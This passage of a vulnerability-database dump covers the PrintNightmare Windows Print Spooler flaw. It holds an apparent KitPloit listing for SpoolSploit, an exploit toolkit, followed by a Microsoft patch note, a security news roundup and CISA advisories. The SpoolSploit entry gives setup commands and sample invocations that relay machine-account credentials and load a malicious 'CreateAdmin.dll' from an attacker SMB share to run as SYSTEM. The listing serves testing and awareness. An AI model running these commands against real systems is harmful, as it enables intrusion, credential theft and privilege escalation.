access.\n\n[![](https://1.bp.blogspot.com/-RH9Wnu2YiuQ/YVi9OZW06YI/AAAAAAAAvWg/V0vRolVeGJAW1XjzaLGce7zf532DLrrQACNcBGAsYHQ/w640-h390/SpoolSploit_1_SpoolSploit-Usage.png)](<https://1.bp.blogspot.com/-RH9Wnu2YiuQ/YVi9OZW06YI/AAAAAAAAvWg/V0vRolVeGJAW1XjzaLGce7zf532DLrrQACNcBGAsYHQ/s1325/SpoolSploit_1_SpoolSploit-Usage.png>)\n\n \n**Getting Started** \n\n\nAs of the release date the SpoolSploit Docker [container](<https://www.kitploit.com/search/label/Container> \"container\" ) has been tested successfully on the latest versions of `MacOS`, `Ubuntu Linux`, and `Windows 10`.\n\nAlthough not required, if you would like to host malicious DLLs or conduct credential relay attacks, all within the SpoolSploit container, you should ensure port 445 is not in use on the host running Docker. This is most prevalent when running this container on a Windows host, as it uses port 445 by default. If disabling port 445 on your host is not practical, that is okay! You can simply run the docker container in a [virtual machine](<https://www.kitploit.com/search/label/Virtual%20Machine> \"virtual machine\" ) that has the network adapter configured in bridge mode. This will allow for serving malicious DLLs and relay credentials. If you only want to serve malicious DLLs, you could simply host the DLLs on an anonymous access share on your host OS or a compromised server share.\n\n \n**Create and access the SpoolSploit Docker container** \n\n\n 1. Clone this repository\n \n \n git clone https://github.com/BeetleChunks/SpoolSploit \n \n\n 2. Build the SpoolSploit Docker container image\n \n \n cd SpoolSploit \n sudo docker build -t spoolsploit . \n \n\n 3. Create and start the SpoolSploit Docker container\n \n \n sudo docker run -dit -p 445:445 --name spoolsploit spoolsploit:latest \n \n\n 4. Attach to the container\n \n \n sudo docker exec -it spoolsploit /bin/bash \n \n\n \n**Command-line Usage** \n\n \n \n usage: spool_sploit.py [-h] -a {spoolsample,nightmare} -rH RHOST -rP {139,445} [-lH LHOST] [-lS LSHARE] -d DOMAIN -u USER -p PASSWD \n \n optional arguments: \n -h, --help show this help message and exit \n -a {spoolsample,nightmare}, --attack {spoolsample,nightmare} \n Attack type to execute on target(s). \n -rH RHOST, --rhost RHOST \n Remote target IP, CIDR range, or filename (file:<path>) \n -rP {139,445}, --rport {139,445} \n Remote SMB server port. \n -lH LHOST, --lhost LHOST \n Listening hostname or IP \n -lS LSHARE, --lshare LSHARE \n Staging SMB share (UNC) \n -d DOMAIN, --domain DOMAIN \n Domain for authentication \n -u USER, --username USER \n Username for authentication \n -p PASSWD, --password PASSWD \n Password for authentication \n \n Example - spoolsample: \n python3 spool_sploit.py -a spoolsample -lH 10.14.1.24 -d evil.corp -u rjmcdow -p 'P4ssword123!' -rP 445 -rH 10.5.1.10 \n \n Example - nightmare: \n python3 spool_sploit.py -a nightmare -lS '\\\\10.14.1.24\\C$\\CreateAdmin.dll' -d evil.corp -u rjmcdow -p 'P4ssword123!' -rP 445 -rH 10.5.1.10 \n \n\n \n**SpoolSample - Capture and relay Windows machine account credentials** \n\n\nThe SpoolSploit Docker container includes [Responder](<https://github.com/lgandx/Responder> \"Responder\" ) for relaying machine account hashes obtained from executing the `spoolsample` attack in SpoolSploit. As several great articles exist detailing the process of relaying privileged machine account credentials for privilege escalation, I will not go into those details here.\n\n \n\n\n[![](https://1.bp.blogspot.com/-9iR_vZDcp-8/YVi9c9w_qrI/AAAAAAAAvWk/conVpwxj6zgRd1O4kRGrz-e5xu3jTjLLgCNcBGAsYHQ/w640-h522/SpoolSploit_2_SpoolSample.gif)](<https://1.bp.blogspot.com/-9iR_vZDcp-8/YVi9c9w_qrI/AAAAAAAAvWk/conVpwxj6zgRd1O4kRGrz-e5xu3jTjLLgCNcBGAsYHQ/s1483/SpoolSploit_2_SpoolSample.gif>)\n\n \n\n\n**PrintNightmare (CVE-2021-1675) - Execute malicious DLLs on Windows targets as SYSTEM** \n\n\nIncluded in the SpoolSploit container is an SMB server implemented via [Impacket](<https://github.com/SecureAuthCorp/impacket> \"Impacket\" ). This server can be used to host malicious DLLs when executing the `printnightmare` attack in SpoolSploit. The default SMB server settings work, but if you want to customize them you can modify the configuration file located at `/home/dlogmas/smbserver/smb-v1.conf`.\n\nThe only thing you need to do is copy your DLL to the SMB server's share folder in the SpoolSploit container. The share path in the container is `/home/dlogmas/smbserver/share/`. The following commands demonstrate how to upload a DLL to the SpoolSploit container and make it accessible to the SMB server.\n \n \n sudo docker cp ./malicious.dll spoolsploit:/home/dlogmas/smbserver/share/ \n sudo docker exec spoolsploit /bin/sh -c 'sudo chown dlogmas:dlogmas /home/dlogmas/smbserver/share/malicious.dll' \n \n\n \n\n\n[![](https://1.bp.blogspot.com/-IqUvx7SXavM/YVi9igITTRI/AAAAAAAAvWs/9nikcO6EzWcW7r2BBW6nLGx3obnPjHIDgCNcBGAsYHQ/w640-h522/SpoolSploit_3_PrintNightmare.gif)](<https://1.bp.blogspot.com/-IqUvx7SXavM/YVi9igITTRI/AAAAAAAAvWs/9nikcO6EzWcW7r2BBW6nLGx3obnPjHIDgCNcBGAsYHQ/s1483/SpoolSploit_3_PrintNightmare.gif>)\n\n \n\n\n**Disclaimer** \n\n\nThis proof-of-concept code has been created for academic research and is not intended to be used against systems except where explicitly authorized. The code is provided as is with no guarantees or promises on its execution. I am not responsible or liable for misuse of this code.\n\n \n**Credits** \n \n**SpoolSample - [Microsoft](<https://www.kitploit.com/search/label/Microsoft> \"Microsoft\" ) Feature** \n\n\n * [leechristensen](<https://github.com/leechristensen/SpoolSample> \"leechristensen\" ) discovered the SpoolSample exploit and created a C# POC [SpoolSample](<https://github.com/leechristensen/SpoolSample/tree/master/SpoolSample> \"SpoolSample\" )\n * [3xocyte](<https://gist.github.com/3xocyte> \"3xocyte\" ) created a Python2 SpoolSample POC [dementor](<https://gist.github.com/3xocyte/cfaf8a34f76569a8251bde65fe69dccc#file-dementor-py> \"dementor\" ).\n \n**PrintNightmare - CVE-2021-1675 / CVE-2021-34527** \n\n\n * [cube0x0](<https://github.com/cube0x0> \"cube0x0\" ) created Python PrintNightmare exploit after implementing the MS-PAR & MS-RPRN protocols and API calls in [Impacket](<https://github.com/SecureAuthCorp/impacket> \"Impacket\" ).\n * [Zhiniang Peng](<https://twitter.com/edwardzpeng> \"Zhiniang Peng\" ) & [Xuefeng Li](<https://twitter.com/lxf02942370> \"Xuefeng Li\" ) discovered this exploit.\n \n \n\n\n**[Download SpoolSploit](<https://github.com/BeetleChunks/SpoolSploit> \"Download SpoolSploit\" )**\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-07T11:30:00", "type": "kitploit", "title": "SpoolSploit - A Collection Of Windows Print Spooler Exploits Containerized With Other Utilities For Practical Exploitation", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-10-07T11:30:00", "id": "KITPLOIT:232707789076746523", "href": "http://www.kitploit.com/2021/10/spoolsploit-collection-of-windows-print.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "mskb": [{"lastseen": "2023-11-28T09:54:39", "description": "None\n**EXPIRATION NOTICE****IMPORTAN**T As of 9/12/2023, this KB is only available from Windows Update. It is no longer available from the Microsoft Update Catalog or other release channels. We recommend that you update your devices to the latest security quality update. \n\n**6/21/21 \nIMPORTANT **This release includes the Flash Removal Package. Taking this update will remove Adobe Flash from the machine. For more information, see the [Update on Adobe Flash Player End of Support](<https://blogs.windows.com/msedgedev/2020/09/04/update-adobe-flash-end-support/>).\n\n**11/17/20**For information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-quality-updates-primer/ba-p/2569385>). To view other notes and messages, see the Windows 10, version 2004 update history [home page](<https://support.microsoft.com/en-us/help/4555932>). \n**Note **Follow [@WindowsUpdate](<https://twitter.com/windowsupdate>) to find out when new content is published to the release information dashboard.\n\n## Highlights\n\n * Updates a remote code execution exploit in the Windows Print Spooler service, known as \u201cPrintNightmare\u201d, as documented in [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>).\n\n## Improvements and fixes\n\n**Note: **To view the list of addressed issues, click or tap the OS name to expand the collapsible section.\n\n### \n\n__\n\nWindows 10 servicing stack update - 19041.1081, 19042.1081, and 19043.1081\n\n * This update makes quality improvements to the servicing stack, which is the component that installs Windows updates. Servicing stack updates (SSU) ensure that you have a robust and reliable servicing stack so that your devices can receive and install Microsoft updates.\n\n### \n\n__\n\nWindows 10, version 21H1\n\nThis security update includes quality improvements. Key changes include:\n\n * This build includes all the improvements from Windows 10, version 2004.\n * No additional issues were documented for this release.\n\n### \n\n__\n\nWindows 10, version 20H2\n\nThis security update includes quality improvements. Key changes include:\n\n * This build includes all the improvements from Windows 10, version 2004.\n * No additional issues were documented for this release.\n\n### \n\n__\n\nWindows 10, version 2004\n\nThis security update includes quality improvements. Key changes include:\n\n * Addresses a remote code execution exploit in the Windows Print Spooler service, known as \u201cPrintNightmare\u201d, as documented in [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>). After installing this and later Windows updates, users who are not administrators can only install signed print drivers to a print server. By default, administrators can install signed and unsigned printer drivers to a print server. The installed root certificates in the system\u2019s Trusted Root Certification Authorities trusts signed drivers. Microsoft recommends that you immediately install this update on all supported Windows client and server operating system, starting with devices that currently host the print server role. You also have the option to configure the **RestrictDriverInstallationToAdministrators** registry setting to prevent non-administrators from installing signed printer drivers on a print server. For more information, see KB5005010.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.\n\n**Windows Update Improvements** \n \nMicrosoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.\n\n## Known issues in this update\n\n### \n\n__\n\nClick or tap to view the known issues\n\n**Symptoms**| **Workaround** \n---|--- \nWhen using the Microsoft Japanese Input Method Editor (IME) to enter Kanji characters in an app that automatically allows the input of Furigana characters, you might not get the correct Furigana characters. You might need to enter the Furigana characters manually.**Note **The affected apps are using the **ImmGetCompositionString()** function.| This issue is resolved in KB5005101. \nDevices with Windows installations created from custom offline media or custom ISO image might have [Microsoft Edge Legacy](<https://support.microsoft.com/en-us/microsoft-edge/what-is-microsoft-edge-legacy-3e779e55-4c55-08e6-ecc8-2333768c0fb0>) removed by this update, but not automatically replaced by the new Microsoft Edge. This issue is only encountered when custom offline media or ISO images are created by slipstreaming this update into the image without having first installed the standalone servicing stack update (SSU) released March 29, 2021 or later.**Note **Devices that connect directly to Windows Update to receive updates are not affected. This includes devices using Windows Update for Business. Any device connecting to Windows Update should always receive the latest versions of the SSU and latest cumulative update (LCU) without any extra steps.| To avoid this issue, be sure to first slipstream the SSU released March 29, 2021 or later into the custom offline media or ISO image before slipstreaming the LCU. To do this with the combined SSU and LCU packages now used for Windows 10, version 20H2 and Windows 10, version 2004, you will need to extract the SSU from the combined package. Use the following steps to extract the SSU:\n\n 1. Extract the cab from the msu via this command line (using the package for KB5000842 as an example): **expand Windows10.0-KB5000842-x64.msu /f:Windows10.0-KB5000842-x64.cab <destination path>**\n 2. Extract the SSU from the previously extracted cab via this command line: **expand Windows10.0-KB5000842-x64.cab /f:* <destination path>**\n 3. You will then have the SSU cab, in this example named **SSU-19041.903-x64.cab**. Slipstream this file into your offline image first, then the LCU.\nIf you have already encountered this issue by installing the OS using affected custom media, you can mitigate it by directly installing the [new Microsoft Edge](<https://www.microsoft.com/edge>). If you need to broadly deploy the new Microsoft Edge for business, see [Download and deploy Microsoft Edge for business](<https://www.microsoft.com/edge/business/download>). \nAfter installing this update, you might have issues printing to certain printers. Various brands and models are affected, primarily receipt or label printers that connect via USB.**Note **This issue is not related to [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) or [CVE-2021-1675](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675>).| This issue is resolved in KB5004237. \nAfter installing the May 25, 2021 (KB5003214) and June 21, 2021 (KB5003690) updates, some devices cannot install new updates, such as the July 6, 2021 (KB5004945) or later updates. You will receive the error message, \"PSFX_E_MATCHING_BINARY_MISSING\".| For more information and a workaround, see KB5005322. \nUniversal Windows Platform (UWP) apps might not open on devices that have undergone a Windows device reset. This includes operations that were initiated using Mobile Device Management (MDM), such as Reset this PC, Push-button reset, and Autopilot Reset. UWP apps you downloaded from the Microsoft Store are not affected. Only a limited set of apps are affected, including:\n\n * App packages with framework dependencies\n * Apps that are provisioned for the device, not per user account.\nThe affected apps will fail to open without error messages or other observable symptoms. They must be re-installed to restore functionality.| This issue is addressed in KB5015878 for all releases starting June 21, 2021 and later. \n \n## How to get this update\n\n**Before installing this update**Microsoft now combines the latest servicing stack update (SSU) for your operating system with the latest cumulative update (LCU). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.Prerequisite:For Windows Server Update Services (WSUS) deployment:\n\n * Install the May 11, 2021 update (KB5003173) before you install the latest cumulative update.\nFor offline Deployment Image Servicing and Management (**DISM.exe**) deployment:\n\n * If an image does not have the February 24, 2021 (KB4601382) or later cumulative update, install the January 12, 2021 SSU (KB4598481) and the May 11, 2021 update (KB5003173).\n**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update or Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nWindows Update for Business| No| No longer available. \nMicrosoft Update Catalog| No| No longer available. \nWindows Server Update Services (WSUS)| No| No longer available. \n \n**If you want to remove the LCU**To remove the LCU after installing the combined SSU and LCU package, use the [DISM/Remove-Package](<https://docs.microsoft.com/en-us/windows-hardware/manufacture/desktop/dism-operating-system-package-servicing-command-line-options>) command line option with the LCU package name as the argument. You can find the package name by using this command: **DISM /online /get-packages**.Running [Windows Update Standalone Installer](<https://support.microsoft.com/en-us/topic/description-of-the-windows-update-standalone-installer-in-windows-799ba3df-ec7e-b05e-ee13-1cdae8f23b19>) (**wusa.exe**) with the **/uninstall **switch on the combined package will not work because the combined package contains the SSU. You cannot remove the SSU from the system after installation.\n\n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 5004945](<https://download.microsoft.com/download/6/0/4/6046cc97-919a-434d-86de-db2fe63580d0/5004945.csv>). For a list of the files that are provided in the servicing stack update, download the [file information for the SSU - version 19041.1081, 19042.1081, and 19043.1081](<https://download.microsoft.com/download/6/2/d/62d4d81c-0498-4abf-95e7-b9be18ddcabd/SSU_version_19041_1081.csv>). \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-06T00:00:00", "type": "mskb", "title": "July 6, 2021\u2014KB5004945 (OS Builds 19041.1083, 19042.1083, and 19043.1083) Out-of-band", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-06T00:00:00", "id": "KB5004945", "href": "https://support.microsoft.com/en-us/help/5004945", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "avleonov": [{"lastseen": "2021-08-03T08:35:33", "description": "Hello guys! The second episode of Last Week\u2019s Security news from June 28 to July 4.\n\nThe most interesting vulnerability of the last week is of course [Microsoft Print Spooler "PrintNightmare"](<https://www.tenable.com/blog/cve-2021-1675-proof-of-concept-leaked-for-critical-windows-print-spooler-vulnerability>). By [sending an RpcAddPrinterDriverEx() RPC request](<https://www.kb.cert.org/vuls/id/383432>), for example over SMB, a remote, authenticated attacker may be able to execute arbitrary code with SYSTEM privileges on a vulnerable Windows system. And there is a public PoC exploit for this vulnerability published by the Chinese security firm Sangfor. And there is some strange story. It turns out that Sangfor published an exploit for the 0day vulnerability. But they thought this vulnerability (CVE-2021-1675) had already been patched as part of the June Micorosft Patch Tuesday. And then it turns out that this is a bug in the Microsoft patch. But Microsoft wrote that this is a different, new vulnerability CVE-2021-34527 and so there were no problems with the previous patch. In any case, a patch for this vulnerability has not yet been released and [Microsoft is suggesting two Workarounds](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>). Option 1 - Disable the Print Spooler service, Option 2 - Disable inbound remote printing through Group Policy. Do this first for Domain Controllers and other critical Windows servers. All versions of Windows contain the vulnerable code and are susceptible to exploitation. Also note that the new vulnerability has a flag Exploitation Detected on the MS site. \n\nThe most interesting attack of the week is [Kaseya VSA Supply-Chain Attack](<https://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689>). Kaseya Limited is an American software company that develops software for managing networks, systems, and information technology infrastructure. [Kaseya VSA](<https://www.kaseya.com/products/vsa/>) (Virtual System Administrator) is a cloud-based MSP (Managed Service Provider) platform that allows providers to perform patch management and client monitoring for their customers. So, REvil gang used around [30 MSPs across the US, AUS, EU, and LATAM where Kaseya VSA was to encrypt over 1,000 businesses](<https://www.reddit.com/r/msp/comments/ocggbv/crticial_ransomware_incident_in_progress/>). It is now believed that this was an attack on on-premises VSA servers using SQL injection and authentication bypass vulnerabilities. Well, by agreeing to use the MSP, be prepared for such surprises.\n\nContinuing the topic of vulnerabilities in services that simplify system administration, Finnish cybersecurity company Nixu [has published a writeup for Remote Code Execution](<https://www.nixu.com/blog/remote-code-execution-vulnerability-microsoft-intune-managed-windows-devices>) vulnerability in Microsoft Intune managed Windows devices ([CVE-2021-31980](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31980>)) from June Patch Tuesday. "This proof-of-concept shows that remote attackers can run code with system privileges on a Windows machine by intercepting the TLS connections. This vulnerability could be exploited to install malware to the victim\u2019s machine to take persistent full control over it". Intune Management Extension updates itself without any user action when the computer is connected to internet. But computers not connected to internet might still run the vulnerable version on startup.\n\nI liked the [new Metasploit module](<https://vulners.com/metasploit/MSF:EXPLOIT/LINUX/LOCAL/DOCKER_RUNC_ESCAPE/>) that leverages a flaw in `runc` to escape a Docker container and get command execution on the host as root. It overwrites the `runc` binary with the payload and wait for someone to use `docker exec` to get into the container.\n\nAnd I want to mention these vulnerabilities: \n\n * [Microsoft Translation Bugs Open Edge Browser to Trivial UXSS Attacks.](<https://threatpost.com/microsoft-edge-browser-uxss-attacks/167389/>) "Remotely inject and execute arbitrary code on any website just by sending a message".\n * [Pre-Auth Remote Code Execution Vulnerability (CVE-2021-35464)](<https://blog.rapid7.com/2021/06/30/forgerock-openam-pre-auth-remote-code-execution-vulnerability-what-you-need-to-know/>) in ForgeRock Access Manager.\n * The vulnerability in Windows 10 allows a low-privileged user to [wipe out arbitrary files needed for UEFI boot](<https://www.thezdi.com/blog/2021/6/30/cve-2021-26892-an-authorization-bypass-on-the-microsoft-windows-efi-system-partition>).\n * [Western Digital's older network-attached storage systems](<https://www.darkreading.com/attacks-breaches/mybook-investigation-reveals-attackers-exploited-legacy-0-day-vulnerabilities/d/d-id/1341440>) allowed unauthenticated commands to trigger a factory reset, formatting the hard drives.\n * Microsoft Discloses [Critical Bugs Allowing Takeover](<https://thehackernews.com/2021/06/microsoft-discloses-critical-bugs.html>) of [NETGEAR Routers](<https://www.netgear.com/support/product/DGN2200v1.aspx>).\n![](http://feeds.feedburner.com/~r/avleonov/~4/iv5hnOt7XD8)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-05T15:19:07", "type": "avleonov", "title": "Last Week\u2019s Security news: PrintNightmare, Kaseya, Intune, Metasploit Docker escape", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-26892", "CVE-2021-31980", "CVE-2021-34527", "CVE-2021-35464"], "modified": "2021-07-05T15:19:07", "id": "AVLEONOV:30285D85FDB40C8D55F6A24D9D446ECF", "href": "http://feedproxy.google.com/~r/avleonov/~3/iv5hnOt7XD8/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2021-07-08T18:09:13", "description": "_(Updated July 2, 2021) _For new information and mitigations, see [Microsoft's updated guidance for the Print spooler vulnerability (CVE-2021-34527)](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>).\n\n_(Updated July 1, 2021) _See [Microsoft's new guidance for the Print spooler vulnerability (CVE-2021-34527)](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) and apply the necessary workarounds. \n\n_(Original post June 30, 2021)_ The CERT Coordination Center (CERT/CC) has released a [VulNote](<https://www.kb.cert.org/vuls/id/383432>) for a critical remote code execution vulnerability in the Windows Print spooler service, noting: \u201cwhile Microsoft has released an [update for CVE-2021-1675](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675>), it is important to realize that this update does not address the public exploits that also identify as CVE-2021-1675.\u201d An attacker can exploit this vulnerability\u2014nicknamed PrintNightmare\u2014to take control of an affected system.\n\nCISA encourages administrators to disable the Windows Print spooler service in Domain Controllers and systems that do not print. Additionally, administrators should employ the following best practice from Microsoft\u2019s [how-to guides](<https://docs.microsoft.com/en-us/defender-for-identity/cas-isp-print-spooler>), published January 11, 2021: \u201cDue to the possibility for exposure, domain controllers and Active Directory admin systems need to have the Print spooler service disabled. The recommended way to do this is using a Group Policy Object.\u201d \n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/06/30/printnightmare-critical-windows-print-spooler-vulnerability>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-06-30T00:00:00", "type": "cisa", "title": "PrintNightmare, Critical Windows Print Spooler Vulnerability ", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-02T00:00:00", "id": "CISA:367C27124C09604830E0725F5F3123F7", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/06/30/printnightmare-critical-windows-print-spooler-vulnerability", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-08T18:12:56", "description": "Microsoft has released [out-of-band security updates](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) to address a remote code execution (RCE) vulnerability\u2014known as PrintNightmare (CVE-2021-34527)\u2014in the Windows Print spooler service. According to the CERT Coordination Center (CERT/CC), \u201cThe Microsoft Windows Print Spooler service fails to restrict access to functionality that allows users to add printers and related drivers, which can allow a remote authenticated attacker to execute arbitrary code with SYSTEM privileges on a vulnerable system.\u201d\n\nThe updates are cumulative and contain all previous fixes as well as protections for CVE-2021-1675. The updates do not include Windows 10 version 1607, Windows Server 2012, or Windows Server 2016\u2014Microsoft states updates for these versions are forthcoming. Note: According to CERT/CC, \u201cthe Microsoft update for CVE-2021-34527 only appears to address the Remote Code Execution (RCE via SMB and RPC) variants of the PrintNightmare, and not the Local Privilege Escalation (LPE) variant.\u201d See [CERT/CC Vulnerability Note VU #383432](<https://www.kb.cert.org/vuls/id/383432>) for workarounds for the LPE variant.\n\nCISA encourages users and administrators to review the [Microsoft Security Updates](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) as well as [CERT/CC Vulnerability Note VU #383432](<https://www.kb.cert.org/vuls/id/383432>) and apply the necessary updates or workarounds. For additional background, see [CISA\u2019s initial Current Activity on PrintNightmare](<https://us-cert.cisa.gov/ncas/current-activity/2021/06/30/printnightmare-critical-windows-print-spooler-vulnerability>).\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/07/06/microsoft-releases-out-band-security-updates-printnightmare>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-06T00:00:00", "type": "cisa", "title": "Microsoft Releases Out-of-Band Security Updates for PrintNightmare", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-06T00:00:00", "id": "CISA:6C836D217FB0329B2D68AD71789D1BB0", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/07/06/microsoft-releases-out-band-security-updates-printnightmare", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-02T18:08:35", "description": "SolarWinds has released an [advisory](<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211>) addressing a vulnerability\u2014CVE-2021-35211\u2014affecting Serv-U Managed File Transfer and Serv-U Secure FTP. Exploitation of this vulnerability may allow a remote attacker to take control of an affected system. Note: this vulnerability does not affect any other SolarWinds or N-able (formerly SolarWinds MSP) products. \n \nMicrosoft [has 